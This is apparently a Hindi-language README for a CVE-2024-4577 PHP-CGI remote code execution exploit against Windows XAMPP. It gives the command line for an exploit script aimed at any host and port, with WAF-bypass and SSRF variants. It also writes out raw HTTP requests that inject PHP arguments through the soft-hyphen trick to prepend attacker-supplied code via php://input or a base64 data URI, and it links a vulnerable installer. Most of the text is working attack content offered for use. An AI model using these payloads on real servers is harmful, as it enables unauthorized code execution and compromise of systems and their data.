
[भेद्यता पुनरुत्पादन] PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला दुनिया का पहला CVE-2024-4577 PHP-CGI RCE भेद्यता का EXP।
cgi.force_redirect + REDIRECT-STATUS.allow_url_include, auto_prepend_file, auto_append_file की आवश्यकता के बिना RCE. कोई भी फ़ाइल और php फ़ाइल शामिल कर सकते हैं.allow_url_include, auto_prepend_file, auto_append_file दिखाई नहीं देंगे.| जानकारी | सामग्री |
|---|---|
| भेद्यता नाम | PHP RCE |
| भेद्यता संख्या | CVE-2024-4577 |
| जोखिम स्तर | उच्च जोखिम |
| भेद्यता प्रकार | RCE |
WAF बाईपास परिदृश्य + डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
उदाहरण:
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
SSRF परिदृश्य + डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
<?php die("Te"."sT");?>
डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
XAMPP Windows संस्करण 8.2.12
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
या आप स्वयं यहां प्रभावित संस्करण चुन सकते हैं: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
कोई संशोधन आवश्यक नहीं, डिफ़ॉल्ट कॉन्फ़िगरेशन रखें
उपरोक्त EXP का उपयोग करके परीक्षण करें
जांचें कि क्या स्ट्रिंग "TesT" या सर्वर की system.ini फ़ाइल सामग्री वापस आती है
| शोषण कठिनाई | कम |